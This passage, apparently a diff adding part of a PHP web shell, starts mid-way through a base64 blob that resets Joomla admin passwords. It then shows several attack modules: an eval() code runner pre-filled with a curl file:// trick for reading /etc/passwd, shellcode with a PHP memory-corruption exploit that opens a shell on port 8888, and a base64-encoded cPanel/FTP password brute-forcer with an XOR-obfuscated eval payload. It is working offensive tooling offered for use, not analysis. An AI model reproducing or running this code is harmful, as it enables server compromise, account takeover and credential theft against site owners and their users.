+XCIgbmFtZT1cInBhc3N3b3JkXCIgdHlwZT1cInBhc3N3b3JkXCI+PGJyPgogIDxicj4KU2V0IEEg
+TmV3IHVzZXJuYW1lIEZvciBMb2dpbiA6IDxJTlBVVCBuYW1lPVwiYWRtaW5cIiBzaXplPVwiMTVc
+IiB2YWx1ZT1cImFkbWluXCI+PGJyPgpEb25gdCBDaGFuZ2UgaXQgUGFzc3dvcmQgaXMgOiAxMjM0
+NTY6IDxJTlBVVCBuYW1lPVwicHdkXCIgc2l6ZT1cIjE1XCIgdmFsdWU9XCJlMTBhZGMzOTQ5YmE1
+OWFiYmU1NmUwNTdmMjBmODgzZVwiPjxicj4KCjxJTlBVVCB2YWx1ZT1cImNoYW5nZVwiIG5hbWU9
+XCJzZW5kXCIgdHlwZT1cInN1Ym1pdFwiPgo8L0ZPUk0+IjsKfWVsc2V7CiRsb2NhbGhvc3QgPSAk
+X1BPU1RbJ2xvY2FsaG9zdCddOwokZGF0YWJhc2UgID0gJF9QT1NUWydkYXRhYmFzZSddOwokdXNl
+cm5hbWUgID0gJF9QT1NUWyd1c2VybmFtZSddOwokcGFzc3dvcmQgID0gJF9QT1NUWydwYXNzd29y
+ZCddOwokcHdkICAgPSAkX1BPU1RbJ3B3ZCddOwokYWRtaW4gPSAkX1BPU1RbJ2FkbWluJ107CkBt
+eXNxbF9jb25uZWN0KCRsb2NhbGhvc3QsJHVzZXJuYW1lLCRwYXNzd29yZCkgb3IgZGllKG15c3Fs
+X2Vycm9yKCkpOwpAbXlzcWxfc2VsZWN0X2RiKCRkYXRhYmFzZSkgb3IgZGllKG15c3FsX2Vycm9y
+KCkpOwokaGFzaCA9IGNyeXB0KCRwd2QpOwokU1FMPUBteXNxbF9xdWVyeSgiVVBEQVRFIGpvc191
+c2VycyBTRVQgdXNlcm5hbWUgPSciLiRhZG1pbi4iJyBXSEVSRSBJRCA9IDYyIikgb3IgZGllKG15
+c3FsX2Vycm9yKCkpOwokU1FMPUBteXNxbF9xdWVyeSgiVVBEQVRFIGpvc191c2VycyBTRVQgcGFz
+c3dvcmQgPSciLiRwd2QuIicgV0hFUkUgSUQgPSA2MiIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsK
+JFNRTD1AbXlzcWxfcXVlcnkoIlVQREFURSBqb3NfdXNlcnMgU0VUIHVzZXJuYW1lID0nIi4kYWRt
+aW4uIicgV0hFUkUgSUQgPSA2MyIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsKJFNRTD1AbXlzcWxf
+cXVlcnkoIlVQREFURSBqb3NfdXNlcnMgU0VUIHBhc3N3b3JkID0nIi4kcHdkLiInIFdIRVJFIElE
+ID0gNjMiKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7CiRTUUw9QG15c3FsX3F1ZXJ5KCJVUERBVEUg
+am9zX3VzZXJzIFNFVCB1c2VybmFtZSA9JyIuJGFkbWluLiInIFdIRVJFIElEID0gNjQiKSBvciBk
+aWUobXlzcWxfZXJyb3IoKSk7CiRTUUw9QG15c3FsX3F1ZXJ5KCJVUERBVEUgam9zX3VzZXJzIFNF
+VCBwYXNzd29yZCA9JyIuJHB3ZC4iJyBXSEVSRSBJRCA9IDY0Iikgb3IgZGllKG15c3FsX2Vycm9y
+KCkpOwokU1FMPUBteXNxbF9xdWVyeSgiVVBEQVRFIGpvc191c2VycyBTRVQgdXNlcm5hbWUgPSci
+LiRhZG1pbi4iJyBXSEVSRSBJRCA9IDY1Iikgb3IgZGllKG15c3FsX2Vycm9yKCkpOwokU1FMPUBt
+eXNxbF9xdWVyeSgiVVBEQVRFIGpvc191c2VycyBTRVQgcGFzc3dvcmQgPSciLiRwd2QuIicgV0hF
+UkUgSUQgPSA2NSIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsKaWYoJFNRTCl7CmVjaG8gIjxiPlN1
+Y2Nlc3MgOk5vdyBVc2UgQSBOZXcgVXNlciBBbmQgUGFzc3dvcmQgLSAoMTIzNDU2KSI7Cn0KfQ==
+"));
+break;
+case "PHP_24":
+� � $code=stripslashes($_POST['code']);
+� � echo '<center><br><h3> PHP Code Evaluating </h3></center>
+� � <center>
+� � <form method="POST" action="">
+� � <input type="hidden" name="id" value="eval">
+� � <textarea name ="code" rows="10" cols="85"
+class="textarea">',$code,'mkDIR("file:");
+chdir("file:");
+mkDIR("etc");
+chdir("etc");
+mkDIR("passwd");
+chdir("..");
+chdir("..");
+
+$ch = curl_init();
+
+curl_setopt($ch, CURLOPT_URL, "file:file:///etc/passwd");
+curl_setopt($ch, CURLOPT_HEADER, 0);
+
+curl_exec($ch);
+
+curl_close($ch);</textarea><br><br>
+� � <input type="submit" value=" Evaluate PHP Code" class="button"><hr>
+� � </form>
+� � <textarea rows="10" cols="85" class="textarea">';
+� � eval($code);
+� � echo '</textarea><br><br>';
+break;
+case "PHP_25":
+� �$shellcode = "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89".
+
+� � � � � � � � "\xe1\xcd\x80\x52\x43\x68\xff\x02".
+
+� � � � � � � � "\x22\xb8". //port (8888)
+
+� � � � � � � � "\x89\xe1".
+
+� � � � � � � � "\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80".
+
+� � � � � � � � "\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0".
+
+� � � � � � � � "\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80".
+
+� � � � � � � � "\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f".
+
+� � � � � � � � "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+
+
+� $________________________str = str_repeat("A", 39);
+
+� $________________________yyy = &$________________________str;
+
+� $________________________xxx = &$________________________str;
+
+� for ($i = 0; $i < 65534; $i++) $arr[] = &$________________________str;
+
+� $________________________aaa = " � XXXXX � ";
+
+� $________________________aab = " XXXx.xXXX ";
+
+� $________________________aac = " XXXx.xXXX ";
+
+� $________________________aad = " � XXXXX � ";
+
+� unset($________________________xxx);
+
+� unset($________________________aaa);
+
+� unset($________________________aab);
+
+� unset($________________________aac);
+
+� unset($________________________aad);
+
+� $arr = array($shellcode => 1);
+
+
+
+� $addr = unpack("L", substr($________________________str, 6*4, 4));
+
+� $addr = $addr[1] + 32;
+
+� $addr = pack("L", $addr);
+
+
+
+� for ($i=0; $i<strlen($addr); $i++) {
+
+� � $________________________str[8*4+$i] = $addr[$i];
+
+� � $________________________yyy[8*4+$i] = $addr[$i];
+
+� }
+
+� unset($arr);
+break;
+case "PHP_26":
+
+$crackftp = 'PD9waHAKJGNwYW5lbF9wb3J0PSIyMDgyIjsKJGNvbm5lY3RfdGltZW91dD01OwpzZXRfdGltZV9s
+aW1pdCgwKTsKJHN1Ym1pdD0kX1JFUVVFU1RbJ3N1Ym1pdCddOwokdXNlcnM9JF9SRVFVRVNUWyd1
+c2VycyddOwokcGFzcz0kX1JFUVVFU1RbJ3Bhc3N3b3JkcyddOwokdGFyZ2V0PSRfUkVRVUVTVFsn
+dGFyZ2V0J107CiRjcmFja3R5cGU9JF9SRVFVRVNUWydjcmFja3R5cGUnXTsKaWYoJHRhcmdldCA9
+PSAiIil7CiR0YXJnZXQgPSAibG9jYWxob3N0IjsKfQokY2hhcnNldD0kX1JFUVVFU1RbJ2NoYXJz
+ZXQnXTsKaWYoJGNoYXJzZXQ9PSIiKQogJGNoYXJzZXQ9Imxvd2VyY2FzZSI7CiRtYXhfbGVuZ3Ro
+PSRfUkVRVUVTVFsnbWF4X2xlbmd0aCddOwppZigkbWF4X2xlbmd0aD09IiIpCiAkbWF4X2xlbmd0
+aD0xMDsKJG1pbl9sZW5ndGg9JF9SRVFVRVNUWydtaW5fbGVuZ3RoJ107CmlmKCRtaW5fbGVuZ3Ro
+PT0iIikKICRtaW5fbGVuZ3RoPTE7CgogJGNoYXJzZXRhbGwgPSBhcnJheSgiYSIsICJiIiwgImMi
+LCAiZCIsICJlIiwgImYiLCAiZyIsICJoIiwgImkiLCAiaiIsICJrIiwgImwiLCAibSIsICJuIiwg
+Im8iLCAicCIsICJxIiwgInIiLCAicyIsICJ0IiwgInUiLCAidiIsICJ3IiwgIngiLCAieSIsICJ6
+IiwgIkEiLCAiQiIsICJDIiwgIkQiLCAiRSIsICJGIiwgIkciLCAiSCIsICJJIiwgIkoiLCAiSyIs
+ICJMIiwgIk0iLCAiTiIsICJPIiwgIlAiLCAiUSIsICJSIiwgIlMiLCAiVCIsICJVIiwgIlYiLCAi
+VyIsICJYIiwgIlkiLCAiWiIsICIwIiwgIjEiLCAiMiIsICIzIiwgIjQiLCAiNSIsICI2IiwgIjci
+LCAiOCIsICI5Iik7CiAkY2hhcnNldGxvd2VyID0gYXJyYXkoImEiLCAiYiIsICJjIiwgImQiLCAi
+ZSIsICJmIiwgImciLCAiaCIsICJpIiwgImoiLCAiayIsICJsIiwgIm0iLCAibiIsICJvIiwgInAi
+LCAicSIsICJyIiwgInMiLCAidCIsICJ1IiwgInYiLCAidyIsICJ4IiwgInkiLCAieiIpOwogJGNo
+YXJzZXR1cHBlciA9IGFycmF5KCJBIiwgIkIiLCAiQyIsICJEIiwgIkUiLCAiRiIsICJHIiwgIkgi
+LCAiSSIsICJKIiwgIksiLCAiTCIsICJNIiwgIk4iLCAiTyIsICJQIiwgIlEiLCAiUiIsICJTIiwg
+IlQiLCAiVSIsICJWIiwgIlciLCAiWCIsICJZIiwgIloiKTsKICRjaGFyc2V0bnVtZXJpYyA9IGFy
+cmF5KCIwIiwgIjEiLCAiMiIsICIzIiwgIjQiLCAiNSIsICI2IiwgIjciLCAiOCIsICI5Iik7CiAk
+Y2hhcnNldGxvd2VybnVtZXJpYyA9IGFycmF5KCJhIiwgImIiLCAiYyIsICJkIiwgImUiLCAiZiIs
+ICJnIiwgImgiLCAiaSIsICJqIiwgImsiLCAibCIsICJtIiwgIm4iLCAibyIsICJwIiwgInEiLCAi
+ciIsICJzIiwgInQiLCAidSIsICJ2IiwgInciLCAieCIsICJ5IiwgInoiLCAiMCIsICIxIiwgIjIi
+LCAiMyIsICI0IiwgIjUiLCAiNiIsICI3IiwgIjgiLCAiOSIpOwogJGNoYXJzZXR1cHBlcm51bWVy
+aWMgPSBhcnJheSgiQSIsICJCIiwgIkMiLCAiRCIsICJFIiwgIkYiLCAiRyIsICJIIiwgIkkiLCAi
+SiIsICJLIiwgIkwiLCAiTSIsICJOIiwgIk8iLCAiUCIsICJRIiwgIlIiLCAiUyIsICJUIiwgIlUi
+LCAiViIsICJXIiwgIlgiLCAiWSIsICJaIiwgIjAiLCAiMSIsICIyIiwgIjMiLCAiNCIsICI1Iiwg
+IjYiLCAiNyIsICI4IiwgIjkiKTsKICRjaGFyc2V0bGV0dGVycyA9IGFycmF5KCJhIiwgImIiLCAi
+YyIsICJkIiwgImUiLCAiZiIsICJnIiwgImgiLCAiaSIsICJqIiwgImsiLCAibCIsICJtIiwgIm4i
+LCAibyIsICJwIiwgInEiLCAiciIsICJzIiwgInQiLCAidSIsICJ2IiwgInciLCAieCIsICJ5Iiwg
+InoiLCAiQSIsICJCIiwgIkMiLCAiRCIsICJFIiwgIkYiLCAiRyIsICJIIiwgIkkiLCAiSiIsICJL
+IiwgIkwiLCAiTSIsICJOIiwgIk8iLCAiUCIsICJRIiwgIlIiLCAiUyIsICJUIiwgIlUiLCAiViIs
+ICJXIiwgIlgiLCAiWSIsICJaIiApOwogJGNoYXJzZXRzeW1ib2xzPSBhcnJheSgiISIsICJAIiwg
+IiMiLCAiJCIsICIlIiwgIl4iLCAiJiIsICIqIiwgIigiLCAiKSIsIl8iICk7CiAkY2hhcnNldGxv
+d2Vyc3ltYm9scyA9IGFycmF5KCJhIiwgImIiLCAiYyIsICJkIiwgImUiLCAiZiIsICJnIiwgImgi
+LCAiaSIsICJqIiwgImsiLCAibCIsICJtIiwgIm4iLCAibyIsICJwIiwgInEiLCAiciIsICJzIiwg
+InQiLCAidSIsICJ2IiwgInciLCAieCIsICJ5IiwgInoiLCIhIiwgIkAiLCAiIyIsICIkIiwgIiUi
+LCAiXiIsICImIiwgIioiLCAiKCIsICIpIiwiXyIgKTsKICRjaGFyc2V0dXBwZXJzeW1ib2xzID0g
+YXJyYXkoIkEiLCAiQiIsICJDIiwgIkQiLCAiRSIsICJGIiwgIkciLCAiSCIsICJJIiwgIkoiLCAi
+SyIsICJMIiwgIk0iLCAiTiIsICJPIiwgIlAiLCAiUSIsICJSIiwgIlMiLCAiVCIsICJVIiwgIlYi
+LCAiVyIsICJYIiwgIlkiLCAiWiIsIiEiLCAiQCIsICIjIiwgIiQiLCAiJSIsICJeIiwgIiYiLCAi
+KiIsICIoIiwgIikiLCJfIiApOwogJGNoYXJzZXRsZXR0ZXJzc3ltYm9scyA9IGFycmF5KCJhIiwg
+ImIiLCAiYyIsICJkIiwgImUiLCAiZiIsICJnIiwgImgiLCAiaSIsICJqIiwgImsiLCAibCIsICJt
+IiwgIm4iLCAibyIsICJwIiwgInEiLCAiciIsICJzIiwgInQiLCAidSIsICJ2IiwgInciLCAieCIs
+ICJ5IiwgInoiLCAiQSIsICJCIiwgIkMiLCAiRCIsICJFIiwgIkYiLCAiRyIsICJIIiwgIkkiLCAi
+SiIsICJLIiwgIkwiLCAiTSIsICJOIiwgIk8iLCAiUCIsICJRIiwgIlIiLCAiUyIsICJUIiwgIlUi
+LCAiViIsICJXIiwgIlgiLCAiWSIsICJaIiwiISIsICJAIiwgIiMiLCAiJCIsICIlIiwgIl4iLCAi
+JiIsICIqIiwgIigiLCAiKSIsIl8iICk7CiAkY2hhcnNldG51bWVyaWNzeW1ib2xzID0gYXJyYXko
+IjAiLCAiMSIsICIyIiwgIjMiLCAiNCIsICI1IiwgIjYiLCAiNyIsICI4IiwgIjkiLCIhIiwgIkAi
+LCAiIyIsICIkIiwgIiUiLCAiXiIsICImIiwgIioiLCAiKCIsICIpIiwiXyIgKTsKICRjaGFyc2V0
+bG93ZXJudW1lcmljc3ltYm9scyA9IGFycmF5KCJhIiwgImIiLCAiYyIsICJkIiwgImUiLCAiZiIs
+ICJnIiwgImgiLCAiaSIsICJqIiwgImsiLCAibCIsICJtIiwgIm4iLCAibyIsICJwIiwgInEiLCAi
+ciIsICJzIiwgInQiLCAidSIsICJ2IiwgInciLCAieCIsICJ5IiwgInoiLCAiMCIsICIxIiwgIjIi
+LCAiMyIsICI0IiwgIjUiLCAiNiIsICI3IiwgIjgiLCAiOSIsIiEiLCAiQCIsICIjIiwgIiQiLCAi
+JSIsICJeIiwgIiYiLCAiKiIsICIoIiwgIikiLCJfIiApOwogJGNoYXJzZXR1cHBlcm51bWVyaWNz
+eW1ib2xzID0gYXJyYXkoIkEiLCAiQiIsICJDIiwgIkQiLCAiRSIsICJGIiwgIkciLCAiSCIsICJJ
+IiwgIkoiLCAiSyIsICJMIiwgIk0iLCAiTiIsICJPIiwgIlAiLCAiUSIsICJSIiwgIlMiLCAiVCIs
+ICJVIiwgIlYiLCAiVyIsICJYIiwgIlkiLCAiWiIsICIwIiwgIjEiLCAiMiIsICIzIiwgIjQiLCAi
+NSIsICI2IiwgIjciLCAiOCIsICI5IiwiISIsICJAIiwgIiMiLCAiJCIsICIlIiwgIl4iLCAiJiIs
+ICIqIiwgIigiLCAiKSIsIl8iICk7CiAkY2hhcnNldGxldHRlcnNzeW1ib2xzID0gYXJyYXkoImEi
+LCAiYiIsICJjIiwgImQiLCAiZSIsICJmIiwgImciLCAiaCIsICJpIiwgImoiLCAiayIsICJsIiwg
+Im0iLCAibiIsICJvIiwgInAiLCAicSIsICJyIiwgInMiLCAidCIsICJ1IiwgInYiLCAidyIsICJ4
+IiwgInkiLCAieiIsICJBIiwgIkIiLCAiQyIsICJEIiwgIkUiLCAiRiIsICJHIiwgIkgiLCAiSSIs
+ICJKIiwgIksiLCAiTCIsICJNIiwgIk4iLCAiTyIsICJQIiwgIlEiLCAiUiIsICJTIiwgIlQiLCAi
+VSIsICJWIiwgIlciLCAiWCIsICJZIiwgIloiICwiISIsICJAIiwgIiMiLCAiJCIsICIlIiwgIl4i
+LCAiJiIsICIqIiwgIigiLCAiKSIsIl8iICk7CiAkY2hhcnNldGxldHRlcnNudW1lcmljc3ltYm9s
+cz1hcnJheSgiYSIsICJiIiwgImMiLCAiZCIsICJlIiwgImYiLCAiZyIsICJoIiwgImkiLCAiaiIs
+ICJrIiwgImwiLCAibSIsICJuIiwgIm8iLCAicCIsICJxIiwgInIiLCAicyIsICJ0IiwgInUiLCAi
+diIsICJ3IiwgIngiLCAieSIsICJ6IiwgIkEiLCAiQiIsICJDIiwgIkQiLCAiRSIsICJGIiwgIkci
+LCAiSCIsICJJIiwgIkoiLCAiSyIsICJMIiwgIk0iLCAiTiIsICJPIiwgIlAiLCAiUSIsICJSIiwg
+IlMiLCAiVCIsICJVIiwgIlYiLCAiVyIsICJYIiwgIlkiLCAiWiIgLCIhIiwgIkAiLCAiIyIsICIk
+IiwgIiUiLCAiXiIsICImIiwgIioiLCAiKCIsICIpIiwiXyIsIjAiLCAiMSIsICIyIiwgIjMiLCAi
+NCIsICI1IiwgIjYiLCAiNyIsICI4IiwgIjkiICk7CglpZiAoJGNoYXJzZXQgPT0gImFsbCIpCgkJ
+JHZhbHMgPSAkY2hhcnNldGFsbDsKICAgIGVsc2VpZiAoJGNoYXJzZXQgPT0gImxvd2VyY2FzZSIp
+IAoJCSR2YWxzID0gJGNoYXJzZXRsb3dlcjsKCSBlbHNlaWYgKCRjaGFyc2V0ID09ICJ1cHBlcmNh
+c2UiKSAKCQkkdmFscyA9ICRjaGFyc2V0dXBwZXI7CgkgZWxzZWlmICgkY2hhcnNldCA9PSAibnVt
+ZXJpYyIpIAoJCSR2YWxzID0gJGNoYXJzZXRudW1lcmljOwoJIGVsc2VpZiAoJGNoYXJzZXQgPT0g
+Imxvd2VybnVtZXJpYyIpIAoJCSR2YWxzID0gJGNoYXJzZXRsb3dlcm51bWVyaWM7CgkgZWxzZWlm
+ICgkY2hhcnNldCA9PSAidXBwZXJudW1lcmljIikgCgkJJHZhbHMgPSAkY2hhcnNldHVwcGVybnVt
+ZXJpYzsKCWVsc2VpZiAoJGNoYXJzZXQgPT0gImxldHRlcnMiKSAKCQkkdmFscyA9ICRjaGFyc2V0
+bGV0dGVyczsKCWVsc2VpZiAoJGNoYXJzZXQgPT0gInN5bWJvbHMiKSAKCQkkdmFscyA9ICRjaGFy
+c2V0c3ltYm9sczsKCWVsc2VpZiAoJGNoYXJzZXQgPT0gImxvd2Vyc3ltYm9scyIpIAoJCSR2YWxz
+ID0gJGNoYXJzZXRsb3dlcnN5bWJvbHM7CgllbHNlaWYgKCRjaGFyc2V0ID09ICJ1cHBlcnN5bWJv
+bHMiKSAKCQkkdmFscyA9ICRjaGFyc2V0dXBwZXJzeW1ib2xzOwoJZWxzZWlmICgkY2hhcnNldCA9
+PSAibGV0dGVyc3N5bWJvbHMiKSAKCQkkdmFscyA9ICRjaGFyc2V0bGV0dGVyc3N5bWJvbHM7Cgll
+bHNlaWYgKCRjaGFyc2V0ID09ICJudW1iZXJzc3ltYm9scyIpIAoJCSR2YWxzID0gJGNoYXJzZXRu
+dW1lcmljc3ltYm9sczsKCWVsc2VpZiAoJGNoYXJzZXQgPT0gImxvd2VybnVtZXJpY3N5bWJvbHMi
+KSAKCQkkdmFscyA9ICRjaGFyc2V0bG93ZXJudW1lcmljc3ltYm9sczsKCWVsc2VpZiAoJGNoYXJz
+ZXQgPT0gInVwcGVybnVtZXJpY3N5bWJvbHMiKSAKCQkkdmFscyA9ICRjaGFyc2V0dXBwZXJudW1l
+cmljc3ltYm9sczsKCWVsc2VpZiAoJGNoYXJzZXQgPT0gImxldHRlcnNudW1lcmljc3ltYm9scyIp
+IAoJCSR2YWxzID0gJGNoYXJzZXRsZXR0ZXJzbnVtZXJpY3N5bWJvbHM7CgllbHNlIGVjaG8gIklO
+VkFMSUQgQ0hBUlNFVCI7Cgkka2V5X3RoYXRfc2NyaXB0X2lzX2NyeXB0ZWQ9MTk7CiRyZXNvdXJj
+ZV9jcnlwdGVkX2NvZGUgPSceGTd+YDMuMzdMQFZBRVZBSDFAVkFFVkFMXVJeVjFOPTdMQFZBRVZB
+SDFAUEFaQ0dMXVJeVjFOKB4ZN2BmcTMuMzFAe3Z/fzMtLTMpMzEzPTM3fmAoHhk3fDMuM3JhYXJq
+MzsxfH4xPzFnfnJ6MT8xeUxyfmEiMT8xU3t8MT8xfz1wMTooHhk3dnYzLjM3fEghTj03fEggTj03
+fEgiTj03fEhbdDNdTj03fEgjTigeGTdgdn13My4zU35yen87N3Z2PzdgZnE/N35gOigzHhknOwok
+c3RyaW5nX291dHB1dD1zdHJfcmVwbGFjZSgiW3QxXSIsICI8PyIsICRyZXNvdXJjZV9jcnlwdGVk
+X2NvZGUpOwokc3RyaW5nX291dHB1dD1zdHJfcmVwbGFjZSgiW3QzXSIsICInIiwgJHN0cmluZ19v
+dXRwdXQpOwokbGVudGhfb2ZfY3J5cHRlZF9jb2RlPXN0cmxlbigkc3RyaW5nX291dHB1dCk7CiRl
+dmFsX3BocF9jb2RlPScnOwpmb3IoJGh1aXZhbXZzZW09MDskaHVpdmFtdnNlbTwkbGVudGhfb2Zf
+Y3J5cHRlZF9jb2RlOyRodWl2YW12c2VtKyspCiRldmFsX3BocF9jb2RlIC49IGNocihvcmQoJHN0
+cmluZ19vdXRwdXRbJGh1aXZhbXZzZW1dKSBeICRrZXlfdGhhdF9zY3JpcHRfaXNfY3J5cHRlZCk7
+CmV2YWwoJGV2YWxfcGhwX2NvZGUpOwo/Pgo8aHRtbD4KPGhlYWQ+CjxtZXRhIGh0dHAtZXF1aXY9
+IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIj4KPC9oZWFkPgo8dGl0bGU+Q3BhbmVs
+ICwgRlRQIENyYUNrZVI8L3RpdGxlPgo8Ym9keSB0ZXh0PSIjMDBGRjAwIiBiZ2NvbG9yPSIjMDAw
+MDAwIiB2bGluaz0iIzAwODAwMCIgbGluaz0iIzAwODAwMCIgYWxpbms9IiMwMDgwMDAiPgo8ZGl2
+IGFsaWduPSJjZW50ZXIiPgo8Zm9ybSBtZXRob2Q9IlBPU1QiIHN0eWxlPSJib3JkZXI6IDFweCBz
+b2xpZCAjMDAwMDAwIj4KICAgICAgICA8aW1nIGJvcmRlcj0iMCIgc3JjPSJodHRwOi8vd3d3LmFs
+bTNyZWZoLmNvbS91cGxvYWQvZ3JvdXAvZ3JvdXB4cC5naWYiIHdpZHRoPSI0MjYiIGhlaWdodD0i
+MTY5Ij48dGFibGUgYm9yZGVyPSIxIiB3aWR0aD0iNjclIiBib3JkZXJjb2xvcmxpZ2h0PSIjMDA4
+MDAwIiBib3JkZXJjb2xvcmRhcms9IiMwMDM3MDAiPgogICAgICAgICAgICAgICAgPHRyPgogICAg
+ICAgICAgICAgICAgICAgICAgICA8dGQ+CiAgICAgICAgPHAgYWxpZ249ImNlbnRlciI+PGI+PGZv
+bnQgY29sb3I9IiMwMDgwMDAiIGZhY2U9IlRhaG9tYSIgc2l6ZT0iMiI+CiAgICAgICAgICAgICAg
+ICA8c3BhbiBsYW5nPSJlbi11cyI+SVAgc2VydmVyPC9zcGFuPiA6PC9mb250Pjxmb250IGZhY2U9
+IkFyaWFsIj4KICAgICAgICA8L2ZvbnQ+PGZvbnQgZmFjZT0iQXJpYWwiIGNvbG9yPSIjQ0MwMDAw
+Ij4KICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0idGFyZ2V0IiBzaXplPSIxNiIgdmFs
+dWU9Ijw/cGhwIGVjaG8gJHRhcmdldCA/PiIgc3R5bGU9ImJvcmRlcjogMnB4IHNvbGlkICMxRDFE
+MUQ7IGJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7IGNvbG9yOiMwMDgwMDA7IGZvbnQtZmFtaWx5
+OlZlcmRhbmE7IGZvbnQtd2VpZ2h0OmJvbGQ7IGZvbnQtc2l6ZToxM3B4Ij48L2ZvbnQ+PC9iPjwv
+cD4KICAgICAgICA8cCBhbGlnbj0iY2VudGVyIj48Yj48Zm9udCBjb2xvcj0iIzAwODAwMCIgZmFj
+ZT0iVGFob21hIiBzaXplPSIyIj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm
+bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
+cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsg
+PC9mb250PjwvYj48L3A+CiAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgYWxpZ249ImNlbnRl
+ciI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRhYmxlIGJvcmRlcj0iMSIgd2lk
+dGg9IjU3JSIgYm9yZGVyY29sb3JsaWdodD0iIzAwODAwMCIgYm9yZGVyY29sb3JkYXJrPSIjMDAz
+NzAwIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4KICAgICAg
+ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGFsaWduPSJjZW50
+ZXIiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
+ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8c3BhbiBsYW5nPSJl
+bi11cyI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPjxiPlVzZXIgTGlzdDwvYj48L2ZvbnQ+PC9zcGFu
+PjwvdGQ+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0
+ZD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPHAgYWxp
+Z249ImNlbnRlciI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
+ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxzcGFu
+IGxhbmc9ImVuLXVzIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+PGI+UGFzc3dvcmQgTGlzdDwvYj48
+L2ZvbnQ+PC9zcGFuPjwvdGQ+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
+ICA8L3RyPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdGFibGU+CgogICAgICAg
+ICAgICAgICAgICAgICAgICA8cCBhbGlnbj0iY2VudGVyIj4mbmJzcDs8dGV4dGFyZWEgcm93cz0i
+MjAiIG5hbWU9InVzZXJzIiBjb2xzPSIyNSIgc3R5bGU9ImJvcmRlcjogMnB4IHNvbGlkICMxRDFE
+MUQ7IGJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7IGNvbG9yOiNDMEMwQzAiPjw/cGhwIGVjaG8g
+JHVzZXJzID8+CjwvdGV4dGFyZWE+PHRleHRhcmVhIHJvd3M9IjIwIiBuYW1lPSJwYXNzd29yZHMi
+IGNvbHM9IjI1IiBzdHlsZT0iYm9yZGVyOiAycHggc29saWQgIzFEMUQxRDsgYmFja2dyb3VuZC1j
+b2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCI+PD9waHAgZWNobyAkcGFzcyA/PjwvdGV4dGFy
+ZWE+PGJyPgogICAgICAgIDxicj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8Zm9u
+dCBzdHlsZT0iZm9udC13ZWlnaHQ6NzAwIiBzaXplPSIyIiBmYWNlPSJUYWhvbWEiIGNvbG9yPSIj
+MDA4MDAwIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
+PHNwYW4gbGFuZz0iYXItc2EiPkd1ZXNzIG9wdGlvbnM8L3NwYW4+PC9mb250Pjxmb250IHN0eWxl
+PSJmb250LXNpemU6IDEycHQ7IiBzaXplPSItMyIgZmFjZT0iVmVyZGFuYSI+PHNwYW4gc3R5bGU9
+ImZvbnQtc2l6ZTogOXB0OyI+Jm5ic3A7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
+ICAgICAgICAgICAgICAgIDxmb250IGZhY2U9IlRhaG9tYSI+CiAgICAgICAgICAgICAgICAgICAg
+ICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBuYW1lPSJjcmFja3R5cGUiIHZhbHVl
+PSJjcGFuZWwiIHN0eWxlPSJmb250LXdlaWdodDogNzAwOyIgY2hlY2tlZCB0eXBlPSJyYWRpbyI+
+PC9mb250Pjwvc3Bhbj48L2ZvbnQ+PGI+PGZvbnQgc2l6ZT0iMiIgZmFjZT0iVGFob21hIj4KICAg
+ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ3BhbmVsPC9mb250
+Pjxmb250IHNpemU9IjIiIGNvbG9yPSIjY2MwMDAwIiBmYWNlPSJUYWhvbWEiPgogICAgICAgICAg
+ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2ZvbnQ+PGZvbnQgc2l6ZT0i
+MiIgY29sb3I9IiNGRkZGRkYiIGZhY2U9IlRhaG9tYSI+CiAgICAgICAgICAgICAgICAgICAgICAg
+ICAgICAgICAgICAgICAgICAgICAgICAgICgyMDgyKTwvZm9udD48L2I+PGZvbnQgc2l6ZT0iMiIg
